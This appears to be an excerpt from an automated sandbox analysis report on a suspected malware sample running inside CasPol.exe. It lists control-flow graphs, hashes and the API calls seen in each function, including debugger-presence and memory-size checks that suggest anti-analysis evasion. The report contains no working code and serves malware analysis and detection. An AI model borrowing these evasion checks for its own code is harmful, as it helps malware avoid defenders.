                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                                                    • Opcode ID: df069b9e03ce85f8a3e4f22d46ac25cc17eae2246af820fdaa95a844b3d6fe2c
                                                                                                                                                                                                                                                    • Instruction ID: 4b74dc737ab1f2fe24b25bea2e8dba2813b567416ba0362a0b75bbcf644c1c48
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df069b9e03ce85f8a3e4f22d46ac25cc17eae2246af820fdaa95a844b3d6fe2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D15175B0D1030A9FDB54CFAAD948BAEBBF1EB48300F208429E459A7350DB385984CF65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 833 622de30-622de32 834 622de34-622de38 833->834 835 622de3a 833->835 834->835 836 622de42-622de58 835->836 837 622de3c 835->837 838 622de5b-622de7e 836->838 837->838 839 622de3e-622de40 837->839 840 622de80-622de83 838->840 841 622de86-622de92 838->841 839->836 843 622de94-622de98 841->843 844 622de9a 841->844 843->844 845 622dea2-622deba 844->845 846 622de9c-622de9d 844->846 848 622dec2-622ded2 845->848 849 622debc-622dec0 845->849 846->845 851 622ded4-622ded8 848->851 852 622deda 848->852 849->848 851->852 853 622dee2-622defe 852->853 854 622dedc-622dee0 852->854 855 622df00-622df03 853->855 856 622df06-622df12 853->856 854->853 858 622df14-622df18 856->858 859 622df1a 856->859 858->859 860 622df22-622df32 859->860 861 622df1c-622df20 859->861 863 622df34-622df39 860->863 864 622df3a 860->864 861->860 863->864 865 622df42-622df44 864->865 866 622df3c-622df3e 864->866 867 622df46-622df70 call 622aec4 865->867 868 622df7e-622df86 865->868 866->865 874 622df75-622df76 867->874 870 622df88-622df8c 868->870 871 622df8e 868->871 870->871 872 622df90-622df95 871->872 873 622df96-622dff6 871->873 872->873 875 622e001-622e008 873->875 876 622dff8-622dffe 873->876 877 622e013-622e0b2 CreateWindowExW 875->877 878 622e00a-622e010 875->878 876->875 880 622e0b4-622e0ba 877->880 881 622e0bb-622e0f3 877->881 878->877 880->881 885 622e100 881->885 886 622e0f5-622e0f8 881->886 887 622e101 885->887 886->885 887->887
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9cf0b693be6d139fd58f0584fb7a56feb147d9fa1cb8a368ec608175cb42699e
                                                                                                                                                                                                                                                    • Instruction ID: e06f7043f4959588ced16fa7a6b851fb715e09618000b0090a9da4c266db0d02
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cf0b693be6d139fd58f0584fb7a56feb147d9fa1cb8a368ec608175cb42699e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2891B3B1C1939AAFDF52CFA5C8409CDBFB1AF4A350F19859AF8449B262C3319846CF51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(Graph rendering omitted; basic blocks 622bd98-622c028, Executed / Not Executed marking not reproduced.)
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 0622BFFE
Memory Dump Source
• Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 024034e24ac1f5b0598d6184a5059e8daccfe646d199ba52d144477e1a9a6752
• Instruction ID: b0cea1356e90ec3c752ea24bcc5dfe42299fba97663cb3e2b2c70c73e35315ca
• Opcode Fuzzy Hash: 024034e24ac1f5b0598d6184a5059e8daccfe646d199ba52d144477e1a9a6752
• Instruction Fuzzy Hash: FC817770A10B169FD7A4DF2AD44475ABBF1FF88308F00892DE88ACBA50D774E845CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(Graph rendering omitted; basic blocks 622df90-622e101, Executed / Not Executed marking not reproduced.)
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0622E0A2
Memory Dump Source
• Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: a2fb4dbdd03e24727356616eb024801164b7c096eb1bdd391a06aa36b394921b
• Instruction ID: 3c3608f7f77bb8d1f1a4ff429b35b83d761c3fc38e183f93b30b3a9ac5c4c0c5
• Opcode Fuzzy Hash: a2fb4dbdd03e24727356616eb024801164b7c096eb1bdd391a06aa36b394921b
• Instruction Fuzzy Hash: 1841D2B1D10359AFDB14CF99C884ADEBBB5FF48300F65852AE818AB210D7719945CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(Graph rendering omitted; basic blocks 14470c1-1447190, Executed / Not Executed marking not reproduced.)
APIs
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0144713F
Memory Dump Source
• Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: ff69bc5208c9c4e6c7023e541af668820dfeb39a1754e08bcf967ab442143eba
• Instruction ID: aebaca26e3f73ef8526d2eeebef9c78c532feb305b922a598ee64abe966fdfa8
• Opcode Fuzzy Hash: ff69bc5208c9c4e6c7023e541af668820dfeb39a1754e08bcf967ab442143eba
• Instruction Fuzzy Hash: 1C2178B2D003598FDB14CFA9C8847EEBBF5AF48210F14842AE455E7391D3789945CF60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(Graph rendering omitted; basic blocks 14470c8-1447190, Executed / Not Executed marking not reproduced.)
APIs
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0144713F
Memory Dump Source
• Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: b2eab8af5b2a44750b46b5dd55c84a80ddc2ccfe87036c41469ad3881632a876
• Instruction ID: 5e4752dfa83930486e8ca73a1c4537dac3a748ac1dbdf28aa33d0fc36063d957
• Opcode Fuzzy Hash: b2eab8af5b2a44750b46b5dd55c84a80ddc2ccfe87036c41469ad3881632a876
• Instruction Fuzzy Hash: B72145B28002598FDB14CF9AD884BEEBBF5AF48210F14842AE859A3350D778A944CF60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(Graph rendering omitted; basic blocks 6223ad8-6223b9a, Executed / Not Executed marking not reproduced.)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06223B67
Memory Dump Source
• Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 3786ad749c3d27977ff9a30e02ff44e663e7264ced2ba86f3c93c6adf77b4fc1
• Instruction ID: 13d3fe764ab38041e89712886ad516622f1c4a7bf5147a23b3ad5c1cc6e56856
• Opcode Fuzzy Hash: 3786ad749c3d27977ff9a30e02ff44e663e7264ced2ba86f3c93c6adf77b4fc1
• Instruction Fuzzy Hash: 4B21E3B5D00259AFDB10CFAAD884AEEBBF5EB48310F14841AE914A7350D378A940CF65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(Graph rendering omitted; basic blocks 6223ae0-6223b9a, Executed / Not Executed marking not reproduced.)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06223B67
Memory Dump Source
• Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 22bb60147a34672f2d39a2e94d9c9d61093055e629f7899adff27503db853036
• Instruction ID: 56198a4cf3f4b9e0a53617697724b8313ad081de802f758cc604257fd3333c0d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22bb60147a34672f2d39a2e94d9c9d61093055e629f7899adff27503db853036
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A21E4B5D00359AFDB10CFAAD884BDEBBF4EB48310F14841AE914A3350C378A940CF64
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (image; legend: Executed / Not Executed)
control_flow_graph 1126 144f457-144f4e4 GlobalMemoryStatusEx 1129 144f4e6-144f4ec 1126->1129 1130 144f4ed-144f515 1126->1130 1129->1130
APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 0144F4D7
Memory Dump Source
• Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: cb62c25e94429ef6a01aade22cf71710ced06f982d5036fade8a6a220618e082
• Instruction ID: f23d0748ef365be1c0e403fb4dc40eb7e26cdef3c0f3b7b8f21fa210e97e4350
• Opcode Fuzzy Hash: cb62c25e94429ef6a01aade22cf71710ced06f982d5036fade8a6a220618e082
• Instruction Fuzzy Hash: 512164B2C0025A9FDB10CFAAD944BDEFBB4BF48210F14816AD818B7351C378A945CFA1
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (image; legend: Executed / Not Executed)
control_flow_graph 1117 1447790-1448892 1120 1448894-1448897 1117->1120 1121 144889a-14488c5 DeleteFileW 1117->1121 1120->1121 1122 14488c7-14488cd 1121->1122 1123 14488ce-14488f6 1121->1123 1122->1123
APIs
• DeleteFileW.KERNEL32(00000000), ref: 014488B8
Memory Dump Source
• Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 1bf6bfef1e0be7a351ac711b42a8792f9049f74538ff09e9706d8633c71caded
• Instruction ID: ca6e7d5dc2a2a1f7881472ae75f6fbae9238d6416ceeb97f989567d4851b4b55
• Opcode Fuzzy Hash: 1bf6bfef1e0be7a351ac711b42a8792f9049f74538ff09e9706d8633c71caded
• Instruction Fuzzy Hash: A22158B2C0061A9BEB14CF9AD4447EEFBF4EF48310F10812AE918A7350D374A945CFA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0622C079,00000800,00000000,00000000), ref: 0622C26A
Memory Dump Source
• Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: b3a392405aa9d3184defc687e6450eabd793d0bd8a60ce7bbd8755e59c26f7a9
• Instruction ID: bd63a5faa5be8b0d4294060b32a131ce045462962bbd01084309ca4a65f7da0f
• Opcode Fuzzy Hash: b3a392405aa9d3184defc687e6450eabd793d0bd8a60ce7bbd8755e59c26f7a9
• Instruction Fuzzy Hash: A01137B6D0035A9FDB20DF9AC844BDEFBF4EB88310F14852AD819A7600C775A545CFA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNEL32(00000000), ref: 014488B8
Memory Dump Source
• Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: c1b8483596c12d04a7295456611b830ebb8009689d2093df53288b438f8d701e
• Instruction ID: 2104620360f31a38cd70a4dfb4f720c74fce99e49bbe3d8b070e970baed126c3
• Opcode Fuzzy Hash: c1b8483596c12d04a7295456611b830ebb8009689d2093df53288b438f8d701e
• Instruction Fuzzy Hash: 582124B6C0061A9BEB14CF9AD5457EEFBB4FF48320F14852AD918A7350D338A945CFA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0622C079,00000800,00000000,00000000), ref: 0622C26A
Memory Dump Source
• Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 0d815656cb76a88485d9472a58bcd0487e67793b3c00f9d3ae166ae69a9fd05b
• Instruction ID: 13a2fb3284325957eadc8dd25319dccf27264c5553d2f285e03cb952a32807cb
• Opcode Fuzzy Hash: 0d815656cb76a88485d9472a58bcd0487e67793b3c00f9d3ae166ae69a9fd05b
• Instruction Fuzzy Hash: 751144B6D043499FDB20CF9AC844BDEFBF4EB88310F10852AE919A7600C375A945CFA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 0144F4D7
Memory Dump Source
• Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: a3a127a6f624b30551ca84521a8242736db8c4daeb115452f21cc7fddaf3bba7
• Instruction ID: e4ccc010fde04855b9128311ad3c0aba31871aadc3234a81e35cc4a7e2c097b6
• Opcode Fuzzy Hash: a3a127a6f624b30551ca84521a8242736db8c4daeb115452f21cc7fddaf3bba7
• Instruction Fuzzy Hash: A71123B1C002599BDB20CF9AD444BDEFBF4EF48220F14812AD818A7250D778A944CFA5
Uniqueness
• Uniqueness Score: -1.00%

APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0622BFFE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                    • Opcode ID: cb4b368d8d1b98282ebd3358778340996d324e3ca6ce6381c5a6cde788dccfd6
                                                                                                                                                                                                                                                    • Instruction ID: a9b5edc46a1b2e56b5063b5f592bd9f1b6fabed4ffdca278eb6931a2757f0200
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb4b368d8d1b98282ebd3358778340996d324e3ca6ce6381c5a6cde788dccfd6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C71113B6D0034A9FCB20CF9AC844BDEFBF4EB88314F10841AD819A7210C375A545CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
                                                                                                                                                                                                                                                    • Opcode ID: 4ad9d532b750c6a062625b80bc40d58b59cccd1db322fdbaa1ade0edfe020431
                                                                                                                                                                                                                                                    • Instruction ID: b45c75e8389a01ce38c6a233f22349d27c5ee7e8d39351d379b427263917b03b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ad9d532b750c6a062625b80bc40d58b59cccd1db322fdbaa1ade0edfe020431
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92113A75F54210DFDB549F789905B6E7BF2AB8C610F104469E90AE73A0DB799900CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
                                                                                                                                                                                                                                                    • Opcode ID: c4da0b644d9da720f846b91b0080b3946daad2b054c032c1e19f154d1d8c370c
                                                                                                                                                                                                                                                    • Instruction ID: 3d47de3d285b87522bf60c9a0ae54c79d04f91f4f1e3ae262e7d1d6c228fe54c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4da0b644d9da720f846b91b0080b3946daad2b054c032c1e19f154d1d8c370c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E114C74B14224DFDB44EB789805B6EBBF5AF88600F104469E90AD73A0DB759D00CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5e00bd2b6c6ef71f1b0d5e2a9aa95a722a0005155d3fef5fe47d0d29249dab57
                                                                                                                                                                                                                                                    • Instruction ID: 7f40cb5cba9745943e5f035971f89427bad1d5c9ecf0569fa246c2227e78a8bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e00bd2b6c6ef71f1b0d5e2a9aa95a722a0005155d3fef5fe47d0d29249dab57
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D629B70B1030A8FCB55EB68E494A5EB7A6FF85300B60CA68C4069F355DB75EC86CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c69fd2a525bf99c334dd9fb55e51394ae4427c7e8c5e02da7ea5f3c448ca42d0
                                                                                                                                                                                                                                                    • Instruction ID: 33f9f1bda2480e4e8d9f1f7c84409c8fa4d98e50a3c9bd73daa9de5f7d6125df
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c69fd2a525bf99c334dd9fb55e51394ae4427c7e8c5e02da7ea5f3c448ca42d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE18130F2030A8FDB59EB69D4806AEB7B2FF85300F508529D816AB344DB75DC46CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 078cad2f821f1d5374019164e28aff12f92bed7f6dac13251af537e011cdfa39
                                                                                                                                                                                                                                                    • Instruction ID: 8f1da421b3400864b90b4226e06604a2706e0d993c4db76d787fbf74016a036a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 078cad2f821f1d5374019164e28aff12f92bed7f6dac13251af537e011cdfa39
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4A1B770F1020A8FEF68EB6DD4947AEB7B6FB85351F608429E845E7781CA34DC818B51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e6eb3adad710caea314ad6a792cb1ae9df30e71db805a1a101e5027a5ac00845
                                                                                                                                                                                                                                                    • Opcode ID: bfb2618a7d109b4dc423e14f39dd412ff7b69f29873fc82fd8f3658811c88e03
                                                                                                                                                                                                                                                    • Instruction ID: ce4f949a0cb1c4814b231ba8a6313a01dceafa48a6d523278be550112ae79d5a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfb2618a7d109b4dc423e14f39dd412ff7b69f29873fc82fd8f3658811c88e03
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65518170F102189FEB559FA9C854BAEBBF6FF88700F208429D506AB395DE749C05CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 249dd70a5b0424a1e6916e4b865c4f155340ced687d58d6aa75cb3dc9a886b1e
                                                                                                                                                                                                                                                    • Instruction ID: d119ffe215b224e50ec86feeeb5e4c0f8fc76530646281c05104852c3e6cc762
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 249dd70a5b0424a1e6916e4b865c4f155340ced687d58d6aa75cb3dc9a886b1e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07418B31E1060A8FDF74DFA9D880ABFF7B6EB84210F10492AE55AE7600D330E855CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1a39b6aeada6a214021e9ce722717c7e363c897d46da1cf8bf35b0b806722be5
                                                                                                                                                                                                                                                    • Instruction ID: 688a758fd0f3200b9be6beb96ff35b76095db5d124649a4c8f4f287e952b4a3b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a39b6aeada6a214021e9ce722717c7e363c897d46da1cf8bf35b0b806722be5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD417370E2070ADBDB69EFA5C49475EBBB6FF85704F208929D812E7240DBB09945CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6adc64ecefc09d6e9667c17dfe63c6e7b4e27180a74f83f846a44e235a238110
                                                                                                                                                                                                                                                    • Instruction ID: b9abc2726ecc87ef9b7b9bbe750bd69a2e6d2ea56f82b4556653d230fa3d8d84
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6adc64ecefc09d6e9667c17dfe63c6e7b4e27180a74f83f846a44e235a238110
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8841B670E2074A9FDB69EF75C49465EBBB6FF86704F10492AE802E7240DB71D845CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bb79beecae2971c6bd772c7dbd156b777f01d2915981053d5e69bd6209cf6160
                                                                                                                                                                                                                                                    • Instruction ID: 482c4832b9c36edaf7ed95aaba08d68c47eb020366e3befe6c051aeff7cd6a76
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb79beecae2971c6bd772c7dbd156b777f01d2915981053d5e69bd6209cf6160
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6231DE36F11209DFCB18ABB8E6482ADBBB2FBC4312F108879E506D7240DF359856C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
